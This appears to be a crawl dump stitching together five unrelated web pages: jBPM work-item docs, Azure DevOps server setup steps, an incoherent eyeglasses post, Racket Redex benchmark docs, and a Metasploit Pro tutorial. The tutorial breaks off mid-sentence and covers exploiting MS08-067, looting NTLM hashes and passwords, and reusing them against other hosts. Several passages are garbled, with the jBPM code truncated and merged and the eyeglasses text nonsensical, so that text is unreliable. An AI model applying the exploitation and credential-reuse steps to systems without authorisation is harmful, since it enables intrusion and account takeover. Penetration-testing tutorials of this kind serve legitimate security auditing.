StatefulKnowledgeSession (and also a KieSession) instance. The example code above comes from the example that we will go through in the next session. You can use different work item handlers for the same process depending on the system on which it runs: by registering different work item handlers on different systems, you can customize how a custom work item is processed on a particular system. You can also substitute mock WorkItemHandler instances when testing. Let's start by showing you how to include a simple work item for sending notifications. A work item is defined by a unique name and includes additional parameters that describe the work in more detail. Work items can also return information after they have been executed, specified as results. Our notification work item could be defined using a work definition with four parameters and no results. For example: In our example we will create a MVEL work item definition that defines a "Notification" work item. Using MVEL is the default way to This file will be placed in the project classpath in a directory called META-INF. The work item configuration file for this example, MyWorkDefinitions.wid, will look like this: import org.drools.core project directory structure could then look something like this: project/src/main/resources/META-INF/MyWorkDefinitions.wid We also want to add a specific icon to be used in the process editor with the work item. To add this, you will need .gif or .png images with a pixel size of 16x16. We put them in a directory outside of the META-INF directory, for example, here: project/src/main/resources/icons/notification.gif The jBPM eclipse editor uses the configuration mechanisms supplied by Drools to register work item definition files. That means adding a drools.workDefinitions property to the drools.rulebase.conf file in the META-INF. The drools.workDefinitions property represents a list of files containing work item definitions, separated usings spaces. If you want to exclude all other work item definitions and only use your definition, you could use the following: drools.workDefinitions = MyWorkDefinitions.wid However, if you only want to add the newly created node definition to the existing palette nodes, you can define the drools.workDefinitions property as follows: drools.workDefinitions = MyWorkDefinitions.wid WorkDefinitions.conf We recommended that you use the extension .wid for your own definitions of domain specific nodes. The .conf extension used with the default definition file, WorkDefinitions.conf, for backward compatibility reasons. We've created our work item definition and configured it, so now. Besides any custom properties, the following three properties are available for all work items: Parameter Mapping: Allows you. Here is an example that creates a domain specific node to execute Java, asking for the class and method parameters. It includes a custom java.gif icon and consists of the following files and resulting screenshot: import org.drools.core.process.core.datatype.impl.type.StringDataType; [ // the Java Node work item located in: // project/src/main/resources/META-INF/JavaNodeDefinition.wid [ "name" : "JavaNode", "parameters" : [ "class" : new StringDataType(), "method" : new StringDataType(), ], "displayName" : "Java Node", "icon" : "icons/java.gif" ] ] // located in: project/src/main/resources/META-INF/drools.rulebase.conf drools.workDefinitions = JavaNodeDefinition.wid WorkDefinitions.conf // icon for java.gif located in: // project/src/main/resources/icons/java.gif Once we've created our Notification work item definition (see the sections above), we can then create a custom implementation of a work item handler that will contain the logic to send the notification. In order to execute our Notification work items, we first create a NotificationWorkItemHandler that implements the WorkItemHandler interface: package com.sample; import org.kie.api.runtime.process.WorkItem; import org.kie.api.runtime.process.WorkItemHandler; import org.kie.api);manager.completeWorkItem(workItem.getId(), null); } public void abortWorkItem(WorkItem workItem, WorkItemManager manager) { // Do nothing, notifications cannot be aborted } } This WorkItemHandler sends a notification as an email and then aborted before it has been completed. The WorkItemHandler.abortWorkItem(...) method can be used to specify how to abort such work items. Remember, if the WorkItemManager is not notified about the completion, the process engine will never be notified that your service node has completed. WorkItemHandler instances need to be registered with the WorkItemManager in order to be used. In this case, we need to register an instance of our NotificationWorkItemHandler in order to use it with our process containing a Notification work item. We can do that like this: StatefulKnowledgeSession ksession = kbase.newStatefulKnowledgeSession(); ksession.getWorkItemManager().registerWorkItemHandler( "Notification","Notification", new NotificationWorkItemHandler()new NotificationWorkItemHandler() ); If we were to look at the BPMN2 syntax for our process with the Notification process, we would see something like the following example. Note the use of the tns:taskName attribute in the <task> node. This is necessary for the WorkItemManager to be able to see which WorkItemHandler instance should be used with which task or work item. <?xml version="1.0" encoding="UTF-8"?> <definitions id="Definition" xmlns="" xs:schemaLocation=" BPMN20.xsd" ... xmlns: ... <process isExecutable="true" id="myCustomProcess" name="Domain-Specific Process" > ... <task id="_5" name="Notification Task" tns: ... Different work item handlers could be used depending on the context. For example, during testing or simulation, it might not be necessary to actually execute the work items. In this case specialized dummy work item handlers could be used during testing. A lot of these domain-specific services are generic, and can be reused by a lot of different users. Think for example about integration with Twitter, doing file system operations or sending email. Once such a domain-specific service has been created, you might want to make it available to other users so they can easily import and start using it. A service repository allows you to import services by browsing the repository looking for services you might need and importing these services into your workspace. These will then automatically be added to your palette and you can start using them in your processes. You can also import additional artefacts like for example an icon, any dependencies you might need, a default handler that will be used to execute the service (although you're always free to override the default, for example for testing), etc. To browse the repository, open the wizard to import services, point it to the right location (this could be to a directory in your file system but also a public or private URL) and select the services you would like to import. For example, in Eclipse, right-click your project that contains your processes and select "Configure ... -> Import jBPM services ...". This will open up a repository browser. In the URL field, fill in the URL of your repository (see below for the URL of the public jBPM repository that hosts some common service implementations out-of-the-box), or use the "..." button to browse to a folder on your file system. Click the Get button to retrieve the contents of that repository. Select the service you would like to import and then click the Import button. Note that the Eclipse wizard allows you to define whether you would like to automatically configure the service (so it shows up in the palette of your processes), whether you would also like to download any dependencies that might be needed for executing the service and/or whether you would like to automatically register the default handler, so make sure to mark the right checkboxes before importing your service (if you are unsure what to do, leaving all check boxes marked is probably best). After importing your service, (re)open your process diagram and the new service should show up in your palette and you can start using it in your process. Note that most services also include documentation on how to use them (e.g. what the different input and output parameters are) when you select them browsing the service repository. Click on the image below to see a screencast where we import the twitter service in a new jBPM project and create a simple process with it that sends an actual tweet. Note that you need the necessary twitter keys and secrets to be able to programatically send tweets to your twitter account. How to create these is explained here, but once you have these, you can just drop them in your project using a simple configuration file. Figure 21.1. We are building a public service repository that contains predefined services that people can use out-of-the-box if they want to: This repository contains some integrations for common services like Twitter integration or file system operations that you can import. Simply point the import wizard to this URL to start browsing the repository. If you have an implementation of a common service that you would like to contribute to the community, do not hesitate to contact someone from the development team. We are always looking for contributions to extend our repository. You can set up your own service repository and add your own services by creating a configuration file that contains the necessary information (this is an extended version of the normal work definition configuration file as described earlier in this chapter) and putting the necessary files (like an icon, dependencies, documentation, etc.) in the right folders. The extended configuration file contains the normal properties (like name, parameters, results and icon), with some additional ones. For example, the following extended configuration file describes the Twitter integration service (as shown in the screencast above): import org.drools.core.process.core.datatype.impl.type.StringDataType; [ [ "name" : "Twitter", "description" : "Send a twitter message", "parameters" : [ "Message" : new StringDataType() ], "displayName" : "Twitter", "eclipse:customEditor" : "org.drools.eclipse.flow.common.editor.editpart.work.SampleCustomEditor", "icon" : "twitter.gif", "category" : "Communication", "defaultHandler" : "org.jbpm.process.workitem.twitter.TwitterHandler", "documentation" : "index.html", "dependencies" : [ "file:./lib/jbpm-twitter.jar", "file:./lib/twitter4j-core-2.2.2.jar" ] ] ] WorkItemHandlerinterface and can be used to execute the service). This can automatically be registered as the handler for that service when importing the service from the repository. The root of your repository should also contain an index.conf file that references all the folders that should be processed when searching for services on the repository. Each of those folders should then contain: Twitter.conf) You can create your own hierarchical structure, because if one of those folders also contains an index.conf file, that will be used to scan additional sub-folders. Note that the hierarchical structure of the repository is not shown when browsing the repository using the import wizard, as the category property in the configuration file is used for that.
https://docs.jboss.org/jbpm/v6.0/userguide/jBPMDomainSpecificProcesses.html
2020-11-24T03:11:58
CC-MAIN-2020-50
1606141171077.4
[]
docs.jboss.org
Prepare the new hardware Azure DevOps Services | Azure DevOps Server 2019 | TFS 2018 - TFS 2013 Note: Azure DevOps Server was previously named Visual Studio Team Foundation Server.. Use this topic to: - Choose hardware and name the server - Install SQL Server on the new server - Install SharePoint Foundation on the new server - Install Team Foundation Server Prerequisites To perform the procedures in this topic, you must be a member of the Administrators security group on the server where you want to install the software. Choose hardware and name the server. Name the. Install SQL Server on the new server. Tip Most installations of SQL Server use the default collation settings. The default collation settings are determined by the Windows system locale on the server where you install SQL Server. To install SQL Server to support Team Foundation Server Launch the SQL Server Installation Center. On the SQL Server Installation Center page, choose Installation, and then choose New installation or add features to an existing installation. On the Setup Support Rules page, verify that all rules have passed, and then choose OK. On the Product Key page, provide your product key, and then choose Next. On the License Terms page, review the license agreement. If you accept the terms, select I accept the license terms. Optionally, you can select the check box to send usage data to Microsoft, and then choose Next. On the Setup Support Files page, choose Install. On the Setup Support Rules page, review the setup information. Correct any failure conditions, and then choose Next. On the Setup Role page, choose SQL Server Feature Installation, and then choose Next. On the Feature Selection page, select the following check boxes, and then choose Next: - Database Engine Services - Full-Text Search - Analysis Services, if reporting was part of the deployment you want to restore - Reporting Services, if reporting was part of the deployment you want to restore - Client Tools Connectivity - Management Tools - Basic - Management Tools - Complete On the Installation Rules page, review any warnings and correct any failures, and then choose Next. On the Instance Configuration page, choose Default instance, and then choose Next. On the Disk Space Requirements page, review the information to make sure you have sufficient disk space, and then choose Next. On the Server Configuration page, choose Use the same account for all SQL Server services. In the Use the same account for all SQL Server services window, choose or specify NT AUTHORITY\NETWORK SERVICE, and then choose OK. In the Startup Type column, specify Automatic for all services that you can edit, and then choose Next. On the Database Engine Services page, on the Account Provisioning tab, choose Windows authentication mode and then choose Add Current User to add your account as an administrator for this instance of SQL Server. Optionally add any other user accounts for users you want to act as database administrators, and then choose Next. On the Analysis Services Configuration page, on the Account Provisioning tab, choose Add Current User to add your account as an administrator for the analysis services database. Optionally add any other user accounts for users you want to act as administrators, and then choose Next. On the Reporting Services Configuration page, choose Install the native mode default configuration, and then choose Next. On the Error Reporting page, choose whether to send information about errors to Microsoft, and then choose Next. On the Installation Rules page, review any failures or warnings, and then choose Next. On the Ready to Install page, review the list of components to be installed, and if they match the list of features shown in the illustration below, then choose Install. If you need to make any changes, choose Back. On the Installation Progress page, optionally monitor the installation progress of each component. When all components have finished installing, the Complete page appears.. Installing SharePoint Foundation on the new server Unlike a new installation of Team Foundation Server, you cannot use the installation wizard for TFS to install SharePoint Foundation for you. If you want to be able to restore the project portals and other information used in the SharePoint Foundation portion of your deployment, you must first install SharePoint Foundation manually, and then restore the farm. Use SharePoint Tools to install SharePoint Foundation. Use Windows PowerShell to install SharePoint Foundation: all-SharePoint -SetupExePath "Drive:\SharePoint 2013\Setup\setup.exe" This installs SharePoint Foundation using a PID key in a farm deployment, but does not configure it or create any databases. Instead, you will restore the farm and its databases to this installation. Tip As an alternative, you can choose to use a configuration XML file with the Install-SharePoint command to install SharePoint Foundation. For more information, see Install SharePoint Foundation by using Windows PowerShell. Install Team Foundation Server.
https://docs.microsoft.com/en-us/azure/devops/server/admin/backup/tut-single-svr-prep-new-hw?view=azure-devops-2020
2020-11-24T04:57:24
CC-MAIN-2020-50
1606141171077.4
[]
docs.microsoft.com
Hints for Selecting Those Designer Eyeglasses Which You Will Purchase For you to look more elegant, it will require that you acquire a different fashion from the rest of the people. The designer eyeglasses can be worn for you to add elegance to the outfits that you have. It s you to know which are those designer eyeglasses that you will buy as not all of them are best for you as an individual. You have to use your ways to make better choices in this case.. Considering friends advises can be a great move when you have to determine which designer eyeglasses are. To consider these there will be no need for you to purchase the glasses to replace the ones you bought earlier from time to time. Never purchased the designer eyeglasses that are expensive thinking that they’re the most quality ones.
http://docs-prints.com/2020/09/19/why-no-one-talks-about-anymore-11/
2020-11-24T03:16:03
CC-MAIN-2020-50
1606141171077.4
[]
docs-prints.com
5 Automated Testing Benchmark Redex’s automated testing benchmark provides a collection of buggy models and falsifiable properties to test how efficiently methods of automatic test case generation are able to find counterexamples for the bugs. Each entry in the benchmark contains a check function and multiple generate functions. The check function determines if a given example is a counterexample (i.e. if it uncovers the buggy behavior) and each of the generate functions generates candidate examples to be tried. There are multiple ways to generate terms for each model. They typically correspond to different uses of generate-term, but could be any way to generate examples. See run-gen-and-check for the precise contracts for generate and check functions. Most of the entries in the benchmark are small differences to existing, bug-free models, where some small change to the model introduces the bug. These changes are described using define-rewrite. To run a benchmark entry with a particular generator, see run-gen-and-check/mods. 5.1 The Benchmark Models The programs in our benchmark come from two sources: synthetic examples based on our experience with Redex over the years and from models that we and others have developed and bugs that were encountered during the development process. The benchmark has six different Redex models, each of which provides a grammar of terms for the model and a soundness property that is universally quantified over those terms. Most of the models are of programming languages and most of the soundness properties are type-soundness, but we also include red-black trees with the property that insertion preserves the red-black invariant, as well as one richer property for one of the programming language models (discussed in stlc-sub). For each model, we have manually introduced bugs into a number of copies of the model, such that each copy is identical to the correct one, except for a single bug. The bugs always manifest as a term that falsifies the soundness property. The table in figure 1 gives an overview of the benchmark suite, showing some numbers for each model and bug. Each model has its name and the number of lines of code for the bug-free model (the buggy versions are always within a few lines of the originals). The line number counts include the model and the specification of the property. Each bug has a number and, with the exception of the rvm model, the numbers count from 1 up to the number of bugs. The rvm model bugs are all from Klein et al. (2013)’s work and we follow their numbering scheme (see rvm for more information about how we chose the bugs from that paper). S (Shallow) Errors in the encoding of the system into Redex, due to typos or a misunderstanding of subtleties of Redex. M (Medium) Errors in the algorithm behind the system, such as using too simple of a data-structure that doesn’t allow some important distinction, or misunderstanding that some rule should have a side-condition that limits its applicability. D (Deep) Errors in the developer’s understanding of the system, such as when a type system really isn’t sound and the author doesn’t realize it. U (Unnatural) Errors that are unlikely to have come up in real Redex programs but are included for our own curiosity. There are only two bugs in this category. The size column shows the size of the term representing the smallest counterexample we know for each bug, where we measure size as the number of pairs of parentheses and atoms in the s-expression representation of the term. Each subsection of this section introduces one of the models in the benchmark, along with the errors we introduced into each model. Figure 1: Benchmark Overview 5.1.1 stlc A simply-typed λ-calculus with base types of numbers and lists of numbers, including the constants +, which operates on numbers, and cons, head, tail, and nil (the empty list), all of which operate only on lists of numbers. The property checked is type soundness: the combination of preservation (if a term has a type and takes a step, then the resulting term has the same type) and progress (that well-typed non-values always take a reduction step). We introduced nine different bugs into this system. The first confuses the range and domain types of the function in the application rule, and has the small counterexample: (hd 0). We consider this to be a shallow bug, since it is essentially a typo and it is hard to imagine anyone with any knowledge of type systems making this conceptual mistake. Bug 2 neglects to specify that a fully applied cons is a value, thus the list ((cons 0) nil) violates the progress property. We consider this be be a medium bug, as it is not a typo, but an oversight in the design of a system that is otherwise correct in its approach. We consider the next three bugs to be shallow. Bug 3 reverses the range and the domain of function types in the type judgment for applications. This was one of the easiest bug for all of our approaches to find. Bug 4 assigns cons a result type of int. The fifth bug returns the head of a list when tl is applied. Bug 6 only applies the hd constant to a partially constructed list (i.e., the term (cons 0) instead of ((cons 0) nil)). Only the grammar based random generation exposed bugs 5 and 6 and none of our approaches exposed bug 4. The seventh bug, also classified as medium, omits a production from the definition of evaluation contexts and thus doesn’t reduce the right-hand-side of function applications. Bug 8 always returns the type int when looking up a variable’s type in the context. This bug (and the identical one in the next system) are the only bugs we classify as unnatural. We included it because it requires a program to have a variable with a type that is more complex that just int and to actually use that variable somehow. Bug 9 is simple; the variable lookup function has an error where it doesn’t actually compare its input to variable in the environment, so it effectively means that each variable has the type of the nearest enclosing lambda expression. 5.1.2 poly-stlc This is a polymorphic version of stlc, with a single numeric base type, polymorphic lists, and polymorphic versions of the list constants. No changes were made to the model except those necessary to make the list operations polymorphic. There is no type inference in the model, so all polymorphic terms are required to be instantiated with the correct types in order for the function to type check. Of course, this makes it much more difficult to automatically generate well-typed terms, and thus counterexamples. As with stlc, the property checked is type soundness. All of the bugs in this system are identical to those in stlc, aside from any changes that had to be made to translate them to this model. This model is also a subset of the language specified in Pałka et al. (2011), who used a specialized and optimized QuickCheck generator for a similar type system to find bugs in GHC. We adapted this system (and its restriction in stlc) because it has already been used successfully with random testing, which makes it a reasonable target for an automated testing benchmark. 5.1.3 stlc-sub The same language and type system as stlc, except that in this case all of the errors are in the substitution function. Our own experience has been that it is easy to make subtle errors when writing substitution functions, so we added this set of tests specifically to target them with the benchmark. There are two soundness checks for this system. Bugs 1-5 are checked in the following way: given a candidate counterexample, if it type checks, then all βv-redexes in the term are reduced (but not any new ones that might appear) using the buggy substitution function to get a second term. Then, these two terms are checked to see if they both still type check and have the same type and that the result of passing both to the evaluator is the same. Bugs 4-9 are checked using type soundness for this system as specified in the discussion of the stlc model. We included two predicates for this system because we believe the first to be a good test for a substitution function but not something that a typical Redex user would write, while the second is something one would see in most Redex models but is less effective at catching bugs in the substitution function. The first substitution bug we introduced simply omits the case that replaces the correct variable with the term to be substituted. We considered this to be a shallow error, and indeed all approaches were able to uncover it, although the time it took to do so varied. Bug 2 permutes the order of arguments when making a recursive call. This is also categorized as a shallow bug, although it is a common one, at least based on our experience writing substitutions in Redex. Bug 3 swaps the function and argument positions of an application while recurring, again essentially a typo and a shallow error, although one of the more difficult to find in this model. The fourth substitution bug neglects to make the renamed bound variable fresh enough when recurring past a lambda. Specifically, it ensures that the new variable is not one that appears in the body of the function, but it fails to make sure that the variable is different from the bound variable or the substituted variable. We categorized this error as deep because it corresponds to a misunderstanding of how to generate fresh variables, a central concern of the substitution function. Bug 5 carries out the substitution for all variables in the term, not just the given variable. We categorized it as SM, since it is essentially a missing side condition, although a fairly egregious one. Bugs 6-9 are duplicates of bugs 1-3 and bug 5, except that they are tested with type soundness instead. (It is impossible to detect bug 4 with this property.) 5.1.4 let-poly A language with ML-style let polymorphism, included in the benchmark to explore the difficulty of finding the classic let+references unsoundness. With the exception of the classic bug, all of the bugs were errors made during the development of this model (and that were caught during development). The first bug is simple; it corresponds to a typo, swapping an x for a y in a rule such that a type variable is used as a program variable. Bug number 2 is the classic let+references bug. It changes the rule for let-bound variables in such a way that generalization is allowed even when the initial value expression is not a value. Bug number 3 is an error in the function application case where the wrong types are used for the function position (swapping two types in the rule). Bugs 4, 5, and 6 were errors in the definition of the unification function that led to various bad behaviors. Finally, bug 7 is a bug that was introduced early on, but was only caught late in the development process of the model. It used a rewriting rule for let expressions that simply reduced them to the corresponding ((λ expressions. This has the correct semantics for evaluation, but the statement of type-soundness does not work with this rewriting rule because the let expression has more polymorphism that the corresponding application expression. 5.1.5 list-machine An implementation of Appel et al. (2012)’s list-machine benchmark. This is a reduction semantics (as a pointer machine operating over an instruction pointer and a store) and a type system for a seven-instruction first-order assembly language that manipulates cons and nil values. The property checked is type soundness as specified in Appel et al. (2012), namely that well-typed programs always step or halt. Three mutations are included. The first list-machine bug incorrectly uses the head position of a cons pair where it should use the tail position in the cons typing rule. This bug amounts to a typo and is classified as simple. The second bug is a missing side-condition in the rule that updates the store that has the effect of updating the first position in the store instead of the proper position in the store for all of the store update operations. We classify this as a medium bug. The final list-machine bug is a missing subscript in one rule that has the effect that the list cons operator does not store its result. We classify this as a simple bug. 5.1.6 rbtrees A model that implements the red-black tree insertion function and checks that insertion preserves the red-black tree invariant (and that the red-black tree is a binary search tree). The first bug simply removes the re-balancing operation from insert. We classified this bug as medium since it seems like the kind of mistake that a developer might make in staging the implementation. That is, the re-balancing operation is separate and so might be put off initially, but then forgotten. The second bug misses one situation in the re-balancing operation, namely when a black node has two red nodes under it, with the second red node to the right of the first. This is a medium bug. The third bug is in the function that counts the black depth in the red-black tree predicate. It forgets to increment the count in one situation. This is a simple bug. 5.1.7 delim-cont Takikawa et al. (2013)’s model of a contract and type system for delimited control. The language is Plotkin’s PCF extended with operators for delimited continuations, continuation marks, and contracts for those operations. The property checked is type soundness. We added three bugs to this model. The first was a bug we found by mining the model’s git repository’s history. This bug fails to put a list contract around the result of extracting the marks from a continuation, which has the effect of checking the contract that is supposed to be on the elements of a list against the list itself instead. We classify this as a medium bug. The second bug was in the rule for handling list contracts. When checking a contract against a cons pair, the rule didn’t specify that it should apply only when the contract is actually a list contract, meaning that the cons rule would be used even on non-list contacts, leading to strange contract checking. We consider this a medium bug because the bug manifests itself as a missing list/c in the rule. The last bug in this model makes a mistake in the typing rule for the continuation operator. The mistake is to leave off one-level of arrows, something that is easy to do with so many nested arrow types, as continuations tend to have. We classify this as a simple error. 5.1.8 rvm A existing model and test framework for the Racket virtual machine and bytecode verifier (Klein et al. 2013). The bugs were discovered during the development of the model and reported in section 7 of that paper. Unlike the rest of the models, we do not number the bugs for this model sequentially but instead use the numbers from Klein et al. (2013)’s work. The paper tests two properties: an internal soundness property that relates the verifier to the virtual machine model, and an external property that relates the verifier model to the verifier implementation. We did not include any that require the latter properties because it requires building a complete, buggy version of the Racket runtime system to include in the benchmark. We included all of the internal properties except those numbered 1 and 7 for practical reasons. The first is the only bug in the machine model, as opposed to just the verifier, which would have required us to include the entire VM model in the benchmark. The second would have required modifying the abstract representation of the stack in the verifier model in contorted way to mimic a more C-like implementation of a global, imperative stack. This bug was originally in the C implementation of the verifier (not the Redex model) and to replicate it in the Redex-based verifier model would require us to program in a low-level imperative way in the Redex model, something not easily done. These bugs are described in detail in Klein et al. (2013)’s paper. This model is unique in our benchmark suite because it includes a function that makes terms more likely to be useful test cases. In more detail, the machine model does not have variables, but instead is stack-based; bytecode expressions also contain internal pointers that must be valid. Generating a random (or in-order) term is relatively unlikely to produce one that satisfies these constraints. For example, of the first 10,000 terms produced by the in-order enumeration only 1625 satisfy the constraints. The ad hoc random generator generators produces about 900 good terms in 10,000 attempts and the uniform random generator produces about 600 in 10,000 attempts. To make terms more likely to be good test cases, this model includes a function that looks for out-of-bounds stack offsets and bogus internal pointers and replaces them with random good values. This function is applied to each of the generated terms before using them to test the model. 5.2 Managing Benchmark Modules This section describes utilities for making changes to existing modules to create new ones, intended to assist in adding bugs to models and keeping buggy models in sync with changes to the original model. Defines a syntax transformer bound to id, the effect of which is to rewrite syntax matching the pattern from to the result expression to. The from argument should follow the grammar of a syntax-case pattern, and to acts as the corresponding result expression. The behavior of the match is the same as syntax-case, except that all identifiers in from are treated as literals with the exception of an identifier that has the same binding as a variable-id appearing in the #:variables keyword argument, which is treated as a pattern variable. (The reverse of the situation for syntax-case, where literals must be specified instead.) The rewrite will only be applied in the context of a module form, but it will be applied wherever possible within the module body, subject to a few constraints. The rest of the keyword arguments control where and how often the rewrite may be applied. The #:once-only option specifies that the rewrite can be applied no more than once, and the #:exactly-once option asserts that the rewrite must be applied once (and no more). In both cases a syntax error is raised if the condition is not met. The #:context option searches for syntax of the form (some-id . rest), where the binding of some-id matches that of the first context-id in the #:context list, at which point it recurs on rest but drops the first id from the list. Once every context-id has been matched, the rewrite can be applied. "mod-fx.rkt" 5.3 Running Benchmark Models The get-gen thunk is called to build a generator of random terms (which may close over some state). A new generator is created each time the property is found to be false. Each generated term is passed to check to see if it is a counterexample. The interval in milliseconds between counterexamples is tracked, and the process is repeated either until the time specified by seconds has elapsed or the standard error in the average interval between counterexamples is less than 10% of the average. The result is an instance of run-results containing the total number of terms generated, the total elapsed time, and the number of counterexamples found. More detailed information can be obtained using the benchmark logging facilities, for which name is refers to the name of the model, and type is a symbol indicating the generation type used. A generator module provides the function get-generator, which meets the specification for the get-gen argument to run-gen-and-check, and type, which is a symbol designating the type of the generator. A check module provides the function check, which meets the specification for the check argument to run-gen-and-check. 5.4 Logging Detailed information gathered during a benchmark run is logged to the current-logger, at the 'info level, with the message "BENCHMARK-LOGGING". The data field of the log message contains a bmark-log-data struct, which wraps data of the form: Where event is a symbol that designates the type of event, and timestamp is symbol that contains the current-date of the event in ISO-8601 format. The information in data-list depends on the event, but must be in the form of a list alternating between a keyword and a datum, where the keyword is a short description of the datum. - Run completions ('finished), logged at the end of a run. - Every counterexample found ('counterexample). - New average intervals between counterexamples ('new-average), which are recalculated whenever a counterexample is found. - Major garbage collections ('gc-major). - Heartbeats ('hearbeat) are logged every 10 seconds by the benchmark as a way to be sure that the benchmark has not crashed. - Timeouts ('timeout), which occur when generating or checking a single takes term longer than 5 minutes. 5.5 Plotting Plotting and analysis tools consume data of the form produced by the benchmark logging facilities (see Logging). TODO! 5.6 Finding the Benchmark Models The models included in the distribution of the benchmark are in the "redex/benchmark/models" subdirectory of the redex-benchmark package. In addition to the redex/benchmark/models/all-info library documented here, each such subdirectory contains an info file named according to the pattern "<name>-info.rkt", defining a module that provides a model-specific all-mods function. A command line interface is provided by the file "redex/benchmark/run-benchmark.rkt", which takes an “info” file as described above as its primary argument and provides options for running the listed tests. It automatically writes results from each run to a separate log file, all of which are located in a temporary directory. (The directory path is printed to standard out at the beginning of the run).
https://docs.racket-lang.org/redex/benchmark.html
2020-11-24T03:56:35
CC-MAIN-2020-50
1606141171077.4
[]
docs.racket-lang.org
Credentials Tutorial Credentials provide a gateway into various accounts and systems and can potentially provide a security audit, you may need to test the strength of password policies and verify whether they meet the minimum industry requirements. To do this, you will need to leverage methods like bruteforce, phishing, and exploits to gather passwords so you can identify the weak passwords, common passwords, and top base passwords used by an organization. Once you actually have credentials, you can try to reuse them on additional targets so you can audit password usage and identify the impact of the stolen credentials across a network. To help you gain a better understanding of how credentials are obtained, stored, and used in Metasploit, this tutorial will show you how to exploit a Windows XP target that is vulnerable to the Microsoft Security Bulletin (MS08-067), gain access to the system, collect credentials from it, and reuse those credentials to identify additional targets on which they can be used. Before You Begin Before you start on this tutorial, please make sure you have the following: - Access to a Metasploit Pro instance. - Access to a vulnerable target that has the MS08-067 vulnerability. - Access to other systems that can be reached from the Metasploit Pro instance to test for credential reuse. Terms You Should Know - Bruteforce - A password guessing attack that systematically attempts to authenticate to services using a set of user supplied credentials. - Credential - A public, private, or complete credential pair. A credential can be associated with a realm, but it is not mandatory. - Credential reuse - A password guessing technique that tries to authenticate to a target using known credentials. - Credential type - A plaintext password, SSH key, NTLM hash, or non-replayable hash. - Login - A credential that is associated with a particular service. - Origin - The source of the credential. The origin refers to how the credential was obtained or added to the project, such as through Bruteforce Guess, an exploit, manual entry, or an imported wordlist. - Realm - The functional grouping of database schemas to which the credential belongs. A realm type can be a domain name, a Postgres database, a DB2 database, or an Oracle System Identifier (SID). - Private - A plaintext password, hash, or private SSH key. - Public - A username. - Validated credential - A credential that has successfully authenticated to a target. Tutorial Objectives This tutorial will walk you through the following tasks: - Creating a project - Scanning a target - Checking for MS08-067 - Exploiting MS08-067 - Collecting credentials - Viewing credentials - Validating credentials - Reusing credentials Create a Project The first thing we need to do is create a project, which will contain the workspace and store the data we will collect during this tutorial. To create a project, select Project > New Project from the global menu bar. When the New Project page appears and displays the configuration form, we will need to define the project name, description, and network range. Scan the Target The next thing we need to do is run a Discovery Scan on our target to fingerprint the system and to enumerate open ports and services. We will use the scan data to identify potential vulnerabilities and attack vectors that are available to exploit the target. To access the Discovery Scan, click the Scan button located on the Overview page. When the configuration page appears, we will need to define the address of the host we want to target. Since we do not need to customize any additional settings, we can use the default settings for the rest of the scan. Now we will launch the scan. When the scan completes, we will need to review the data that it was able to gather about the hosts. To see the host data, select Analysis > Hosts from the project tab bar and then click on the host name. Looking at the host details, we can see that the target is a Windows XP system with 8 open services. We can also see that ports 445 and 139 are open, which indicates that the target can potentially be vulnerable to MS08-067. Check for Vulnerabilities Now that we have a potential vulnerability, let's run a Nexpose scan to confirm our suspicions. Nexpose will identify any vulnerabilities that our host may have, based on the services that we enumerated earlier. We have already set up our Nexpose console through the Global Settings, so we can go ahead and launch the Nexpose scan. We will need to choose the Nexpose console that we want to use, define the target we want to scan, and choose the scan template we want to use. For our purposes, we will use the Penetration Test Audit template, which will scan the target using only safe checks. Since we do not have any credentials to provide for the scan or need to specify any additional scan settings, we can go ahead and launch the scan using the default scan configuration. After the scan completes, take a look at the host data again to identify any vulnerabilities that Nexpose was able to find. As we can see from the list, MS08-067 is listed as one of the discovered vulnerabilities. Exploit the Target Now that we have confirmed that our target is missing the MS08-067 patch and vulnerable to exploitation, we're ready to exploit the target. To exploit the MS08-067 vulnerability, we will need to search for a matching exploit in the module database. The search returns a match for our query. Click on the module name to open its configuration page. The configuration page provides us with some basic information about the module, such as its type, ranking, disclosure date, reference IDs for the vulnerability, and whether the module grants high privileges on the target. There are also target, payload, module, evasion, and advanced options that you can configure to fine tune the exploit. At a minimum, we will need to define the target address and the target port (RPORT). Our target has the SMB service running on ports 139 and 445, Since we can only set one RPORT for a module run, we will go ahead and use the default target that has already been predefined for us. The next thing we want to do is configure the payload settings. Since we are attempting to exploit a Windows target, we will want a Meterpreter payload type. We will leave the Auto connection type so that Metasploit will automatically choose a compatible payload connection type for us. In most cases, the Auto option will select a reverse connection because it is more likely to establish a connection between a target machine and the attacking machine. We are now ready to run the module. Click the Run Module button to launch the exploit. When the exploit finishes, we can see from the Task Log that we were able to successfully open a session on the target, which will enable us to interact with the target to do things like gather system information and collect credentials. Collect Credentials To access the open session, we will need to go to the Sessions list and click on the Session ID. This will open the session page, which will display a list of commands that are available to us. The command we will use is Collect System Data, which will let us loot the hashes and passwords from the system. In addition to hashes and passwords, there are other pieces of evidence we can collect as well, such as system information files, services lists, diagnostics logs, and screenshots. When you run the collection task, the task log will display and show you the events that are occurring. View Credentials in a Project Now that we have been able to loot some credentials from the target, let's take a look at how stores and displays them. To view all credentials that are stored in a project, we need to select Credentials > Manage. When the Manage Credentials page appears, it'll show us all of the credentials that are currently stored in the project, as shown below: For each credential, Metasploit displays the following data: logins, private, public, realm, origin, validation status, tags, and private type. Validate a Credential Now that we have a list of credentials, we can go through and validate them to see if they can actually be used to log in to a target. To do this, we will need to access the single credential view. The single credential view will show us the metadata and the related logins for a particular credential. Let's take a look at the first credential in the list. To view the details for the credential, we will need to click on the username. The single credential view is shown below: We can see the public value, private value, private type, and related logins for this credential. Earlier, we defined a login as a credential that can be used against a particular service. In this case, the logins were automatically created by when the credentials were looted from the exploited target. Metasploit detected that the looted credentials were NTLM hashes, which means that they can be used with SMB. Based on this assumption, Metasploit created a login for the credential and the SMB service. To validate the login, we will need to click on the Validate key. While the login is being validated, you will see the validation status change to "Validating". When the validation is complete, the status will change to "Not Validated" if was unable to authenticate to the service. Otherwise, the status changes to "Validated" if was able to successfully authenticate to the service. The validation for the credential was successful, as shown below: Reuse a Validated Credential Now that we have a known and valid credential, we can try to reuse that credential to log in to additional systems. Since password reuse is a common issue, it is possible that the credential might work with other targets in our project. To test the credential with other targets, we are going to use the Credentials Reuse feature. The Credentials Reuse feature provides a guided workflow that helps you select targets and credentials that will be systematically tested for authentication. To access Credentials Reuse, we will need to select Credentials > Reuse from the Project Tasks bar. When the Credentials Reuse page appears, it'll show the targets that are available for testing. These targets are based on the hosts and services that are in the project. The first thing we want to do is select the targets we want to test the credential against. Go ahead and select all of the targets in the project. We'll need to click the Add Target(s) button after we have selected the credentials we want to add to the workflow. Now click on the Credentials tab. Similarly to the Targets tab, 